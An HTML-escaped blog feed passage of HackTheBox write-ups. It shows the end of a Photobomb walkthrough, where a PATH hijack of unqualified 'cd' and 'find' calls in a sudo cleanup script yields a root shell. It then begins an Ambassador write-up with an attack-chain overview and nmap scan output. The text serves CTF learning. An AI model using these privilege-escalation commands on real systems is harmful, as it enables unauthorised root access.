&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#8ec07c">&lt;/span>. /opt/.bashrc
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">cd&lt;/span> /home/wizard/photobomb
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># clean up log files&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[&lt;/span> -s log/photobomb.log &lt;span style="color:#fe8019">]&lt;/span> &lt;span style="color:#fe8019">&amp;amp;&amp;amp;&lt;/span> ! &lt;span style="color:#fe8019">[&lt;/span> -L log/photobomb.log &lt;span style="color:#fe8019">]&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> /bin/cat log/photobomb.log &amp;gt; log/photobomb.log.old
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> /usr/bin/truncate -s0 log/photobomb.log
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># protect the priceless originals&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>find source_images -type f -name &lt;span style="color:#b8bb26">&amp;#39;*.jpg&amp;#39;&lt;/span> -exec chown root:root &lt;span style="color:#fe8019">{}&lt;/span> &lt;span style="color:#b8bb26">\;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Here they are using full path for the commands &lt;code>cat&lt;/code> and &lt;code>truncate&lt;/code> but not for &lt;code>cd&lt;/code> and &lt;code>find&lt;/code>. So we can create files named either &lt;code>cd&lt;/code> or &lt;code>find&lt;/code> and the current working directory to the path. When the script &lt;code>cleanup.sh&lt;/code> will execute with the updated path it will execute the &lt;code>cd&lt;/code> and &lt;code>find&lt;/code> we created instead of the original ones.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>wizard@photobomb:~$ &lt;span style="color:#fabd2f">echo&lt;/span> -e &lt;span style="color:#b8bb26">&amp;#39;#!/bin/bash\nbash&amp;#39;&lt;/span> &amp;gt; &lt;span style="color:#fabd2f">cd&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">echo&lt;/span> -e &lt;span style="color:#b8bb26">&amp;#39;#!/bin/bash\nbash&amp;#39;&lt;/span> &amp;gt; &lt;span style="color:#fabd2f">cd&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>wizard@photobomb:~$ &lt;span style="color:#fabd2f">echo&lt;/span> -e &lt;span style="color:#b8bb26">&amp;#39;#!/bin/bash\nbash&amp;#39;&lt;/span> &amp;gt; find
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">echo&lt;/span> -e &lt;span style="color:#b8bb26">&amp;#39;#!/bin/bash\nbash&amp;#39;&lt;/span> &amp;gt; find
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>wizard@photobomb:~$ chmod +x &lt;span style="color:#fabd2f">cd&lt;/span> find
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>chmod +x &lt;span style="color:#fabd2f">cd&lt;/span> find
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>And either the &lt;code>cd&lt;/code> or the &lt;code>find&lt;/code> script will give us root shell.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>wizard@photobomb:~$ sudo PATH&lt;span style="color:#fe8019">=&lt;/span>$PWD:$PATH /opt/cleanup.sh
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>sudo PATH&lt;span style="color:#fe8019">=&lt;/span>$PWD:$PATH /opt/cleanup.sh
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>root@photobomb:/home/wizard/photobomb# id
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>id
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>uid&lt;span style="color:#fe8019">=&lt;/span>0&lt;span style="color:#fe8019">(&lt;/span>root&lt;span style="color:#fe8019">)&lt;/span> gid&lt;span style="color:#fe8019">=&lt;/span>0&lt;span style="color:#fe8019">(&lt;/span>root&lt;span style="color:#fe8019">)&lt;/span> groups&lt;span style="color:#fe8019">=&lt;/span>0&lt;span style="color:#fe8019">(&lt;/span>root&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>root@photobomb:/home/wizard/photobomb# whoami
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>whoami
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>root
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div></content></item><item><title>Ambassador | HackTheBox</title><link>https://h4r1337.github.io/posts/ambassador/</link><pubDate>Tue, 31 Jan 2023 21:30:30 +0530</pubDate><guid>https://h4r1337.github.io/posts/ambassador/</guid><description>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/ambassador/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/499">Ambassador&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Medium&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://www.hackthebox.eu/home/users/profile/24906">&lt;img src="https://www.hackthebox.eu/badge/image/24906" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;blockquote>
&lt;p>[tip]- About Ambassador
In this medium machine we will exploit a directory traversal vulnarability in an outdated grafana instance to read config and db files. From that we will get passwords for grafana admin panel and mysql instance. Logging into the mysql instance leaks the SSH password for the user &lt;code>developer&lt;/code> who has access to a git repo. The git commit history leaks a token used for Consul. We will use that token to execute command as root.&lt;/p></description><content>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/ambassador/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/499">Ambassador&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Medium&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://www.hackthebox.eu/home/users/profile/24906">&lt;img src="https://www.hackthebox.eu/badge/image/24906" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;blockquote>
&lt;p>[tip]- About Ambassador
In this medium machine we will exploit a directory traversal vulnarability in an outdated grafana instance to read config and db files. From that we will get passwords for grafana admin panel and mysql instance. Logging into the mysql instance leaks the SSH password for the user &lt;code>developer&lt;/code> who has access to a git repo. The git commit history leaks a token used for Consul. We will use that token to execute command as root.&lt;/p>
&lt;/blockquote>
&lt;h4 id="used-tools">Used tools&lt;/h4>
&lt;ul>
&lt;li>nmap&lt;/li>
&lt;li>searchsploit&lt;/li>
&lt;li>&lt;a href="https://www.exploit-db.com/exploits/50581">CVE-2021-43798&lt;/a>&lt;/li>
&lt;/ul>
&lt;hr>
&lt;h1 id="information-gathering">Information Gathering&lt;/h1>
&lt;p>Enumerated open TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> nmap -sC -sV 10.10.11.183 -oA nmap/initial
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Starting Nmap 7.80 &lt;span style="color:#fe8019">(&lt;/span> https://nmap.org &lt;span style="color:#fe8019">)&lt;/span> at 2023-01-21 12:42 IST
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> 10.10.11.183
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up &lt;span style="color:#fe8019">(&lt;/span>0.51s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Not shown: &lt;span style="color:#d3869b">996&lt;/span> closed ports
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE VERSION
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu Linux; protocol 2.0&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http Apache httpd 2.4.41 &lt;span style="color:#fe8019">((&lt;/span>Ubuntu&lt;span style="color:#fe8019">))&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-generator: Hugo 0.94.2
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-server-header: Apache/2.4.41 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-title: Ambassador Development Server
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>3000/tcp open ppp?
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| fingerprint-strings:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| FourOhFourRequest:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| HTTP/1.0 &lt;span style="color:#d3869b">302&lt;/span> Found
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Cache-Control: no-cache
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Content-Type: text/html; charset&lt;span style="color:#fe8019">=&lt;/span>utf-8
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Expires: -1
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Location: /login
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Pragma: no-cache
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Set-Cookie: redirect_to&lt;span style="color:#fe8019">=&lt;/span>%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path&lt;span style="color:#fe8019">=&lt;/span>/; HttpOnly; SameSite&lt;span style="color:#fe8019">=&lt;/span>Lax
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| X-Content-Type-Options: nosniff
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| X-Frame-Options: deny
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| X-Xss-Protection: 1; mode&lt;span style="color:#fe8019">=&lt;/span>block
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Date: Sat, &lt;span style="color:#d3869b">21&lt;/span> Jan &lt;span style="color:#d3869b">2023&lt;/span> 07:14:57 GMT
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Content-Length: &lt;span style="color:#d3869b">29&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| href&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;/login&amp;#34;&lt;/span>&amp;gt;Found&amp;lt;/a&amp;gt;.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| HTTP/1.1 &lt;span style="color:#d3869b">400&lt;/span> Bad Request
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Content-Type: text/plain; charset&lt;span style="color:#fe8019">=&lt;/span>utf-8
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Connection: close
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Request
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| GetRequest:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| HTTP/1.0 &lt;span style="color:#d3869b">302&lt;/span> Found
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Cache-Control: no-cache
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Content-Type: text/html; charset&lt;span style="color:#fe8019">=&lt;/span>utf-8
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Expires: -1
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Location: /login
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Pragma: no-cache
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Set-Cookie: redirect_to&lt;span style="color:#fe8019">=&lt;/span>%2F; Path&lt;span style="color:#fe8019">=&lt;/span>/; HttpOnly; SameSite&lt;span style="color:#fe8019">=&lt;/span>Lax
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| X-Content-Type-Options: nosniff
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| X-Frame-Options: deny
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| X-Xss-Protection: 1; mode&lt;span style="color:#fe8019">=&lt;/span>block
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Date: Sat, &lt;span style="color:#d3869b">21&lt;/span> Jan &lt;span style="color:#d3869b">2023&lt;/span> 07:14:13 GMT
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Content-Length: &lt;span style="color:#d3869b">29&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| href&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;/login&amp;#34;&lt;/span>&amp;gt;Found&amp;lt;/a&amp;gt;.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| HTTPOptions:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| HTTP/1.0 &lt;span style="color:#d3869b">302&lt;/span> Found
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Cache-Control: no-cache
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Expires: -1
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Location: /login
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Pragma: no-cache
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Set-Cookie: redirect_to&lt;span style="color:#fe8019">=&lt;/span>%2F; Path&lt;span style="color:#fe8019">=&lt;/span>/; HttpOnly; SameSite&lt;span style="color:#fe8019">=&lt;/span>Lax
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| X-Content-Type-Options: nosniff
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| X-Frame-Options: deny
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| X-Xss-Protection: 1; mode&lt;span style="color:#fe8019">=&lt;/span>block
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Date: Sat, &lt;span style="color:#d3869b">21&lt;/span> Jan &lt;span style="color:#d3869b">2023&lt;/span> 07:14:21 GMT
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ Content-Length: &lt;span style="color:#d3869b">0&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>3306/tcp open nagios-nsca Nagios NSCA
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| mysql-info:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Protocol: &lt;span style="color:#d3869b">10&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Version: 8.0.30-0ubuntu0.20.04.2
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Thread ID: &lt;span style="color:#d3869b">222&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Capabilities flags: &lt;span style="color:#d3869b">65535&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, SupportsCompression, SupportsLoadDataLocal, ConnectWithDatabase, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, FoundRows, InteractiveClient, IgnoreSpaceBeforeParenthesis, ODBCClient, LongPassword, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Status: Autocommit
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Salt: 4B&lt;span style="color:#b8bb26">\x&lt;/span>06&lt;span style="color:#b8bb26">\x&lt;/span>0Bg^&lt;span style="color:#b8bb26">\x&lt;/span>0E3&lt;span style="color:#b8bb26">\x&lt;/span>10T&lt;span style="color:#b8bb26">\x&lt;/span>0FW&lt;span style="color:#fe8019">}&lt;/span>cpl*i&lt;span style="color:#fe8019">(&lt;/span>&lt;span style="color:#b8bb26">\x&lt;/span>0F
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ Auth Plugin Name: caching_sha2_password
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">1&lt;/span> service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>SF-Port3000-TCP:V&lt;span style="color:#fe8019">=&lt;/span>7.80%I&lt;span style="color:#fe8019">=&lt;/span>7%D&lt;span style="color:#fe8019">=&lt;/span>1/21%Time&lt;span style="color:#fe8019">=&lt;/span>63CB90C4%P&lt;span style="color:#fe8019">=&lt;/span>x86_64-pc-linux-gnu%r&lt;span style="color:#fe8019">(&lt;/span>Ge
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>SF:nericLines,67,&lt;span style="color:#b8bb26">&amp;#34;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:20Request&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>%r&lt;span style="color:#fe8019">(&lt;/span>GetRequest,174,&lt;span style="color:#b8bb26">&amp;#34;HTTP/1\.0\x20302\x20Found\r\nCache-Contro
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:ion:\x201;\x20mode=block\r\nDate:\x20Sat,\x2021\x20Jan\x202023\x2007:14
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF::13\x20GMT\r\nContent-Length:\x2029\r\n\r\n&amp;lt;a\x20href=\&amp;#34;/login\&amp;#34;&amp;gt;Found&amp;lt;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:/a&amp;gt;\.\n\n&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>%r&lt;span style="color:#fe8019">(&lt;/span>Help,67,&lt;span style="color:#b8bb26">&amp;#34;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:x20Bad\x20Request&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>%r&lt;span style="color:#fe8019">(&lt;/span>HTTPOptions,12E,&lt;span style="color:#b8bb26">&amp;#34;HTTP/1\.0\x20302\x20Found\r\nCac
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Sa
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:t,\x2021\x20Jan\x202023\x2007:14:21\x20GMT\r\nContent-Length:\x200\r\n\
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:r\n&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>%r&lt;span style="color:#fe8019">(&lt;/span>RTSPRequest,67,&lt;span style="color:#b8bb26">&amp;#34;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:\x20Bad\x20Request&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>%r&lt;span style="color:#fe8019">(&lt;/span>SSLSessionReq,67,&lt;span style="color:#b8bb26">&amp;#34;HTTP/1\.1\x20400\x20Bad\x20Req
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:uest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:0close\r\n\r\n400\x20Bad\x20Request&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>%r&lt;span style="color:#fe8019">(&lt;/span>TerminalServerCookie,67,&lt;span style="color:#b8bb26">&amp;#34;HTTP/1
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>%r&lt;span style="color:#fe8019">(&lt;/span>TLSSess
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>SF:ionReq,67,&lt;span style="color:#b8bb26">&amp;#34;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:quest&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>%r&lt;span style="color:#fe8019">(&lt;/span>Kerberos,67,&lt;span style="color:#b8bb26">&amp;#34;HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:x20Bad\x20Request&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>%r&lt;span style="color:#fe8019">(&lt;/span>FourOhFourRequest,1A1,&lt;span style="color:#b8bb26">&amp;#34;HTTP/1\.0\x20302\x20Found\
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:r\nSet-Cookie:\x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity\.txt
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:%252ebak;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Opt
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:ions:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:\x20mode=block\r\nDate:\x20Sat,\x2021\x20Jan\x202023\x2007:14:57\x20GMT
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">SF:\r\nContent-Length:\x2029\r\n\r\n&amp;lt;a\x20href=\&amp;#34;/login\&amp;#34;&amp;gt;Found&amp;lt;/a&amp;gt;\.\n\n&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>SF:&lt;span style="color:#fe8019">)&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap &lt;span style="color:#fe8019">done&lt;/span>: &lt;span style="color:#d3869b">1&lt;/span> IP address &lt;span style="color:#fe8019">(&lt;/span>&lt;span style="color:#d3869b">1&lt;/span> host up&lt;span style="color:#fe8019">)&lt;/span> scanned in 214.46 seconds
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="port-80---http-apache-2441">Port 80 - HTTP (Apache 2.4.41)&lt;/h2>
